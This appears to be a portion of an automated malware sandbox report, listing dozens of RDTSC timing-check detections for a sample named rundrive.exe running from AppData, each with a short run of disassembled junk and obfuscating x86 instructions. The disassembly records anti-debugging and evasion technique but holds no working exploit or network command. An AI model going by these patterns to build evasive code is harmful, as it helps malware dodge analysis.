                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C1B7E second address: 5C1B82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C1B82 second address: 5C1B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C2C10 second address: 5C2C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C026C9h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d jl 00007FDA80C026C7h 0x00000013 js 00007FDA80C026C1h 0x00000019 call 00007FDA80C026BAh 0x0000001e pop esi 0x0000001f push 00000000h 0x00000021 movsx esi, cx 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007FDA80C026B8h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 adc si, A35Fh 0x00000045 xchg eax, ebx 0x00000046 push ebx 0x00000047 jns 00007FDA80C026B8h 0x0000004d pushad 0x0000004e popad 0x0000004f pop ebx 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FDA80C026BEh 0x00000058 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C3E1E second address: 5C3E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C48FE second address: 5C4902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C3E22 second address: 5C3E28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C5BE7 second address: 5C5BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C026BBh 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C4902 second address: 5C490C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C3E28 second address: 5C3E32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FDA80C026B6h 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C5BF6 second address: 5C5BFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C5BFA second address: 5C5C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FDA80C026D0h 0x0000000c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C5C20 second address: 5C5C2A instructions: 0x00000000 rdtsc 0x00000002 js 00007FDA80C00882h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C5C2A second address: 5C5C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 57E759 second address: 57E774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007FDA80C00881h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C6277 second address: 5C627B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C6D13 second address: 5C6D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C7997 second address: 5C799C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C799C second address: 5C79A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C79A9 second address: 5C79B6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDA80C026B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C79B6 second address: 5C79BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C817B second address: 5C8184 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5CBDFB second address: 5CBE81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00884h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FDA80C00878h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+1246A083h] 0x0000002b push 00000000h 0x0000002d add dword ptr [ebp+122D1E09h], edi 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007FDA80C00878h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 0000001Ch 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 jmp 00007FDA80C0087Ch 0x00000058 push ecx 0x00000059 pop ecx 0x0000005a popad 0x0000005b rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5CDF80 second address: 5CDFF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 call 00007FDA80C026C6h 0x0000000e pop ebx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FDA80C026B8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b add dword ptr [ebp+1246A048h], ebx 0x00000031 push 00000000h 0x00000033 mov edi, 3D893900h 0x00000038 and ebx, 54301FCEh 0x0000003e xchg eax, esi 0x0000003f js 00007FDA80C026BAh 0x00000045 push edx 0x00000046 push eax 0x00000047 pop eax 0x00000048 pop edx 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FDA80C026BEh 0x00000051 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5CD13A second address: 5CD155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C00887h 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5CF168 second address: 5CF16C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5D0F5E second address: 5D0F64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5D0F64 second address: 5D0F6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FDA80C026B6h 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5D0F6E second address: 5D0F72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5D2F64 second address: 5D2F6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FDA80C026B6h 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5D6632 second address: 5D6636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5D559E second address: 5D55A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5D6636 second address: 5D663B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5D76D3 second address: 5D76DD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDA80C026B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5D663B second address: 5D6649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5D76DD second address: 5D770A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d jmp 00007FDA80C026C4h 0x00000012 pop eax 0x00000013 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5D851D second address: 5D8530 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FDA80C0087Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5D770A second address: 5D7710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5D8530 second address: 5D8534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5D7710 second address: 5D7714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5D85D2 second address: 5D85D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5D85D7 second address: 5D85DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5DA4CA second address: 5DA4CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5DA4CE second address: 5DA4D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5D95D8 second address: 5D95DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5D95DC second address: 5D95E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5DB604 second address: 5DB608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5DB608 second address: 5DB657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a add ebx, 03308B9Eh 0x00000010 push 00000000h 0x00000012 pushad 0x00000013 mov edx, eax 0x00000015 sbb edx, 21F48DABh 0x0000001b popad 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007FDA80C026B8h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 mov edi, dword ptr [ebp+122D38A8h] 0x0000003e xchg eax, esi 0x0000003f push edi 0x00000040 pushad 0x00000041 pushad 0x00000042 popad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5DA778 second address: 5DA782 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDA80C00876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5DB7CA second address: 5DB7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5DB7CE second address: 5DB872 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDA80C00876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 mov di, si 0x00000015 push dword ptr fs:[00000000h] 0x0000001c or dword ptr [ebp+122D1AA8h], edx 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007FDA80C00878h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 cld 0x00000044 mov eax, dword ptr [ebp+122D0E5Dh] 0x0000004a push 00000000h 0x0000004c push edx 0x0000004d call 00007FDA80C00878h 0x00000052 pop edx 0x00000053 mov dword ptr [esp+04h], edx 0x00000057 add dword ptr [esp+04h], 00000018h 0x0000005f inc edx 0x00000060 push edx 0x00000061 ret 0x00000062 pop edx 0x00000063 ret 0x00000064 add dword ptr [ebp+122D2126h], ebx 0x0000006a push FFFFFFFFh 0x0000006c jmp 00007FDA80C00885h 0x00000071 push eax 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007FDA80C00882h 0x0000007a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5E1576 second address: 5E1589 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDA80C026BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5E800A second address: 5E8036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00885h 0x00000007 jmp 00007FDA80C00883h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5E8036 second address: 5E8043 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007FDA80C026B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5E8043 second address: 5E8049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5E8049 second address: 5E806D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007FDA80C026C2h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5E7738 second address: 5E774C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C00880h 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5E774C second address: 5E775B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C026BBh 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5E775B second address: 5E7767 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5E78E7 second address: 5E78FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jnc 00007FDA80C026B6h 0x0000000e popad 0x0000000f push ecx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5EC86C second address: 5EC88A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C0087Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FDA80C00878h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5ECB1B second address: 5ECB20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 57CC42 second address: 57CC4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FDA80C00876h 0x0000000a pop edi 0x0000000b rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 57CC4D second address: 57CC53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 57CC53 second address: 57CC71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00882h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007FDA80C00876h 0x00000011 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 57CC71 second address: 57CC75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5F1A7D second address: 5F1A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5F1A81 second address: 5F1A85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5F1A85 second address: 5F1A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jg 00007FDA80C00876h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5F1A9B second address: 5F1AA5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDA80C026B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5F206C second address: 5F2089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C00884h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5F2089 second address: 5F2093 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDA80C026B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5F21BE second address: 5F21EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 js 00007FDA80C00886h 0x0000000d jne 00007FDA80C00876h 0x00000013 jmp 00007FDA80C0087Ah 0x00000018 je 00007FDA80C0087Ah 0x0000001e popad 0x0000001f push ebx 0x00000020 jnp 00007FDA80C0087Eh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5F2B82 second address: 5F2B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5F2B88 second address: 5F2BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007FDA80C00881h 0x0000000e rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5F2BA2 second address: 5F2BCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C8h 0x00000007 jmp 00007FDA80C026BEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5F2BCF second address: 5F2BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5F75AC second address: 5F75CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FDA80C026C4h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e je 00007FDA80C026B6h 0x00000014 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C8C21 second address: 5C8C5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FDA80C00885h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C8F42 second address: 5C8F48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C8F48 second address: 5C8F4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C8F4E second address: 5C8F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C91A2 second address: 5C91C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 jmp 00007FDA80C00884h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C936B second address: 5C936F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
